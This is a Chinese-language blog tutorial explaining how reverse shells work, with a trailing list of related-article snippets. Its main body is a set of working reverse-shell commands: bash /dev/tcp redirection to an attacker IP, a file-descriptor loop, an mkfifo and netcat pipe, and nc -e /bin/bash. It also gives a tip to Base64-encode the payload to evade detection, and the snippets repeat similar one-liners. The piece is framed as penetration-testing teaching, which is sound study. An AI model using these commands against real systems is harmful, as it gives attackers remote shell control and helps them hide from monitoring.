反弹 Shell(Reverse Shell)原理与实战详解

原创 已于 2025-06-02 13:32:39 修改 · 1.4k 阅读 · 24 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全

于 2025-06-02 13:29:35 首次发布

目录

一、什么是反弹 Shell?

定义:

应用场景:

二、Netcat(nc)简介

常见用法:

主动发送数据:

监听端口等待连接:

三、最常见的 Bash 反弹 Shell 示例

实验环境:

步骤如下:

攻击者监听端口:

被攻击者执行反弹命令:

四、Bash 反弹 Shell 的原理详解

1. bash -i

2. >& /dev/tcp/host/port

3. /dev/tcp/host/port

4. 0>&1

总结:

五、Bash 反弹 Shell 的多种写法

方法一:

方法二:

方法三(高级写法):

方法四(使用管道):

六、使用 Netcat 反弹 Shell

如果支持 -e 参数(旧版本):

如果不支持 -e 参数(新版本):

七、注意事项与最佳实践

1. 确保公网 IP

2. 检查目标系统是否支持 /dev/tcp

3. 防火墙规则检查

4. 编码混淆与绕过检测

八、反弹 Shell 命令生成工具推荐

九、总结

 更多学习资料关注微信公众号:“超防局”

在渗透测试和网络安全领域,反弹 Shell(Reverse Shell) 是一种常见的远程控制技术。它允许攻击者通过监听端口,接收来自目标主机的主动连接,从而获得对目标系统的远程命令行访问权限。

本文将深入解析反弹 Shell 的工作原理、常见实现方式以及相关工具使用技巧,帮助你全面掌握这一关键技术。

一、什么是反弹 Shell?

定义:

反弹 Shell 是指 被控主机主动向攻击者主机发起连接请求,建立一个 TCP 或 UDP 连接后,攻击者可以通过这个连接执行命令并获取输出结果,从而实现远程控制。

应用场景:

  • 渗透测试中绕过防火墙限制
  • 内网穿透时无法直接连接目标主机
  • 获取 WebShell 后进一步提权或持久化控制

二、Netcat(nc)简介

Netcat 被称为“网络瑞士军刀”,是一款强大的网络调试和数据传输工具。它可以用于创建 TCP/UDP 连接、监听端口、发送文件等。

常见用法:

主动发送数据:
echo "Hello" | nc 192.168.1.100 1234

nc 192.168.1.100 1234 < file.txt
监听端口等待连接:
nc -lvnp 1234   # Linux
nc -lvvp 1234   # Windows (Ncat)

三、最常见的 Bash 反弹 Shell 示例

实验环境:

  • 攻击者 IP:192.168.52.137
  • 被攻击者 IP:192.168.52.141
  • 使用 Netcat 监听端口

步骤如下:

攻击者监听端口:
nc -lvnp 1234
被攻击者执行反弹命令:
bash -i >& /dev/tcp/192.168.52.137/1234 0>&1

此时攻击者成功获得被攻击者的 Shell 权限。

四、Bash 反弹 Shell 的原理详解

我们来逐步拆解这条命令:

1. bash -i

启动一个交互式 Bash Shell,确保可以持续输入命令。

2. >& /dev/tcp/host/port

将标准输出(stdout)和标准错误输出(stderr)重定向到指定的 TCP 地址和端口。

3. /dev/tcp/host/port

这是 Bash 提供的一种特殊语法,表示尝试与目标主机建立 TCP 连接。例如:

exec 5<>/dev/tcp/192.168.1.100/1234

会打开一个读写通道(文件描述符 5),连接到指定地址。

4. 0>&1

将标准输入(stdin)重定向到标准输出(stdout),即通过 TCP 连接接收用户输入。

总结:

整条命令的作用是:

  • 在被控机器上启动一个交互式 shell;
  • 将其所有输出(stdout 和 stderr)发送给攻击者;
  • 将攻击者作为输入源(stdin),实现远程控制。

五、Bash 反弹 Shell 的多种写法

方法一:

bash -i >& /dev/tcp/192.168.1.100/1234 0>&1

bash -i >& /dev/tcp/192.168.1.100/1234 0<&1

0>&10<&1 本质上只是文件描述符重定向的方向不同,但在实际使用中效果一致。

方法二:

bash -i >& /dev/tcp/192.168.1.100/1234 <&2

bash -i >& /dev/tcp/192.168.1.100/1234 0<&2

将标准输入重定向到标准错误输出(2),再传递给 bash,实现类似效果。

方法三(高级写法):

exec 5<>/dev/tcp/192.168.1.100/1234; cat <&5 | while read line; do $line >&5 2>&1; done

解释:

  • exec 5<>/dev/tcp/...:打开文件描述符 5 并连接到攻击者。
  • cat <&5:从描述符 5 中读取命令。
  • while read line:逐行执行命令,并将输出返回攻击者。

方法四(使用管道):

rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.1.100 1234 > /tmp/f

解释:

  • 创建一个命名管道 /tmp/f
  • cat /tmp/f 读取攻击者发来的命令。
  • /bin/sh -i 执行命令并将结果通过 nc 返回。
  • 形成一个完整的命令执行回路。

六、使用 Netcat 反弹 Shell

如果支持 -e 参数(旧版本):

nc -e /bin/bash 192.168.1.100 1234

如果不支持 -e 参数(新版本):

rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.1.100 1234 > /tmp/f

七、注意事项与最佳实践

1. 确保公网 IP

反弹 Shell 时应使用公网 IP,避免因内网 IP 无法通信导致失败。

2. 检查目标系统是否支持 /dev/tcp

部分系统(如某些嵌入式 Linux)可能不支持 Bash 的 /dev/tcp 功能。

3. 防火墙规则检查

确保攻击者监听的端口未被防火墙拦截。

4. 编码混淆与绕过检测

在真实攻防中,建议使用编码(如 Base64)或混淆技术隐藏反弹命令。

示例:

echo 'bash -i >& /dev/tcp/192.168.1.100/1234 0>&1' | base64
# 输出:YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMTAwLzEyMzQgMD4mMQo=

然后在目标机器上执行:

echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMTAwLzEyMzQgMD4mMQo= | base64 -d | bash

八、反弹 Shell 命令生成工具推荐

需要的公众号联系我输入"反弹shell"

需要渗透机做反弹shell的可以使用云小站_专享特惠_云产品推荐-阿里云

九、总结

核心要点

描述

反弹 Shell 的本质

被控机主动连接攻击者,实现远程控制

关键命令结构

bash -i >& /dev/tcp/ip/port 0>&1

多种变体写法

包括文件描述符重定向、管道、循环等

Netcat 支持情况

注意是否支持 -e 参数

实战应用

绕过防火墙、内网穿透、WebShell 控制

安全防护建议

禁止非授权远程连接、监控异常流量

 更多学习资料关注微信公众号:“超防局”

反弹shell原理实现
悦分享
08-02 3635
反弹shellreverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shelltelnet,ssh等标准shell对应,本质上是网络概念的客户端服务端的角色反转。假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面、web服务、ssh、telnet等等都是正向连接。...
反弹shell 看这一篇就够了
m0_69043895的博客
04-21 2309
在计算机网络上,OpenSSL 是一个开放源代码的软件库包,应用程序可以使用这个包来进行安全通信,避免窃听,同时确认另一端连接者的身份。SSL协议要求建立在可靠的传输层协议(TCP)之上。SSL协议的优势在于它是应用层协议独立无关的,高层的应用层协议(例如:HTTP,FTP,TELNET等)能透明地建立于SSL协议之上。SSL协议在应用层协议通信之前就已经完成加密算法、通信密钥的协商及服务器认证工作。在此之后应用层协议所传送的数据都会被加密,从而保证通信的私密性。
反弹Shell攻击
k_a_elw的博客
11-18 1425
反弹Shell攻击 什么是 一般的正向攻击:攻击服务器链接目标(e.g. 远程桌面、ssh、web服务、telnet…) 反弹:受害者主机主动链接攻击服务器 为什么 正向攻击不能实现 目标在局域网内 目标ip动态变化 目标防火墙:只能发出请求,不能接受 病毒木马等 不清楚对方开机和网络情况 怎么做 让目标服务器下载bash到主机 让目标运行bash bash 让服务器连接至攻击主机 ...
反弹shell汇总(超详细)
人无名,便可潜心练剑。
05-27 1万+
反弹shell姿势大全,看这一篇就够啦~
反弹Shell,看这一篇就够了
Appleteachers的博客
04-24 1431
前言 在渗透测试实战中,我们经常会遇到Linux系统环境,而让Linux主机反弹shell是再常见不过的事情了。 反弹shell,就是攻击机监听在某个TCP/UDP端口为服务端,目标机主动发起请求到攻击机监听的端口,并将其命令行的输入输出转到攻击机。 正向连接 假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面、web服务、ssh、telnet等等都是正向连接。 反向连接 那么为什么要用反弹shell
免杀基本知识,shellcode混淆免杀
2401_84488537的博客
09-02 1451
1、这里首先使用msf生成基于windows的32位的反弹shell的c/c++语言格式的shellcode。使用visual studio进行生成exe文件,这里使用方式四进行加载,后续会讲到。这里是五种常见的加载代码的方式,选择Release模式,系统为x86,选择生成-->生成解决方案。将生成的exe文件放到相应的win32系统上面运行,msf方面就会上线,(注意目前的shellcode没有做免杀,测试时将杀毒软件关闭)。接下来让我们分析一下这个exe文件时如何上线到正确的地址的。
反弹shell原理
m0_63615772的博客
04-26 2293
假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标IP:目标端口),这是比较常规的形式,我们叫做正向连接。远程桌面,ssh,web服务,smb等等那么什么情况下正向连接不太好用了?(1)某客户机中了你的木马,但是它在局域网内,你直接连接不了。它的IP会动态改变,你不能持续控制。(2)由于防火墙或局域网的限制,对方机器只能发送请求,不能主动请求。
反弹Shell原理实现
m0_62451321的博客
11-14 3748
Windows作为攻击者主机,Linux是被入侵主机(目标主机),此时目标主机上只要能正常运行Linux命令便可以实现反弹,利用Linux的Bash命令重定向和Windows上的Netcat应用程序,如果没有,则网络下载netcat应用程序即可。远程桌面,Web服务,SSH,SMB等等,都是正向连接。(3)对于病毒,木马,受害者什么时候能中招,对方的网络环境是什么样的,什么时候开关机,都是未知,所以建立一个服务端,让恶意程序主动连接,才是上策。(1)某客户机中了你的木马,但是它在局域网内,你直接连接不了。
[渗透测试]反弹shell原理
weixin_47224111的博客
11-23 2906
反弹shell 反弹shell本质就是控制端监听在某TCP/UDP端口,被控制端发起请求到该端口,并将其命令行的输入输出转到控制端 涉及到的基本概念: Linux文件描述符 文件描述符 缩写 描述 0 STDIN 标准输入 1 STDOUT 标准输出 2 STDERR 标准错误输出 在Linux里,所有的东西都是文件,而linux使用文件描述符来标识每个文件对象。包括我们电脑的显示器和键盘,他们都有相应的文件描述符之对应。 重定向 重定向主要分为两种 输入重定向 &
linux反弹shell原理详解
01-08
完整命令 反弹shell命令: bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 bash -i > /dev/tcp/ip/port 0>&1 2>&1 利用nc反弹shell: nc -lvvp 12345 -t -e /bin/bash 原理 bash -i > /dev/tcp/ip/port 0>&1 2>&1 bash -i 打开一个交互式的bash &是为了区分文件1和文件描述符1的 a>&b 的意思是 a>b 2>&1 0代表输入 ,0>&1 意思是,将输出的窗口上所输入的值当作当前窗口的输入。反弹shell后会有两个窗口,即靶机的shell窗口
php-reverse-shell
07-24
**PHP反向Shell详解** PHP反向Shell,也被称为PHP反弹Shell,是一种常见的渗透测试工具,主要用于在Web应用程序中获取远程服务器的命令执行权限。它的工作原理是利用PHP语言的特性,创建一个Web页面,当该页面被...
网络安全反弹Shell
小飞的博客
04-12 2027
网络安全和渗透测试领域,“正向Shell”(Forward Shell)和"反向Shell"(Reverse Shell)是两种常用的技术手段,用于建立远程访问目标计算机的会话。这两种技术都可以让攻击者在成功渗透目标系统后执行命令,但它们在建立连接的方式上有所不同。
【Linux网络安全深度解析】:NC反弹shell原理、影响及应对措施
[【Linux网络安全深度解析】:NC反弹shell原理、影响及应对措施](https://stationx.net/wp-content/uploads/2023/05/2023-Reverse-Shell-Cheat-Sheet-Unlock-Essential-Hacking-Tactics.png) # 摘要 NC反弹shell...
反弹shell的27种方法,都学会轻松让你搞定90%的渗透!黑客技术零基础入门到精通实战教程!
最新发布
资深程序员,曾自学JAVA,C#,如今从业于网安行业
03-06 683
在渗透测试的实践中,反弹shellReverse Shell)是一项至关重要的技术,允许攻击者从远程位置获得对目标系统的交互式命令行访问权限。这一技术通过在被攻击系统上执行特定命令,将shell会话反向传输到攻击者控制的机器上,从而绕过防火墙等安全机制的限制。本文将详细探讨渗透测试中反弹shell的27种方法,但鉴于篇幅和实际操作的安全性考虑,将重点介绍部分高频使用的姿势,仅供参考。
linux反弹shell原理
热门推荐
Shanfenglan's blog
08-24 27万+
完整命令 反弹shell命令: bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 bash -i > /dev/tcp/ip/port 0>&1 2>&1 利用nc反弹shell: nc -lvvp 12345 -t -e /bin/bash 原理 bash -i > /dev/tcp/ip/port 0>&1 2>&1 bash -i 打开一个交互式的bash &是为了
各种反弹shell原理
haoge1998的博客
04-18 1万+
各种反弹shell原理 一、理解反弹shell 1、为什么需要反弹shell 当正向连接不可达时候 客户机中了木马,但是在局域网内,无法正向连接。 由于防火墙和局域网的限制,对方只能发送请求,不可主动接受请求 2、原理 反弹shell:控制端监听某个端口,被控制端发起请求到该端口,并将命令行的输入输出传到控制端 二、常用的反弹shell命令 1、bash进行反弹 (1)在windows上启动监听端口 nc -lvp 4444 l:代表入站监听 v:代表输出信息级别 p:代表监听的端口 (2)在Lin
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

超防局

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值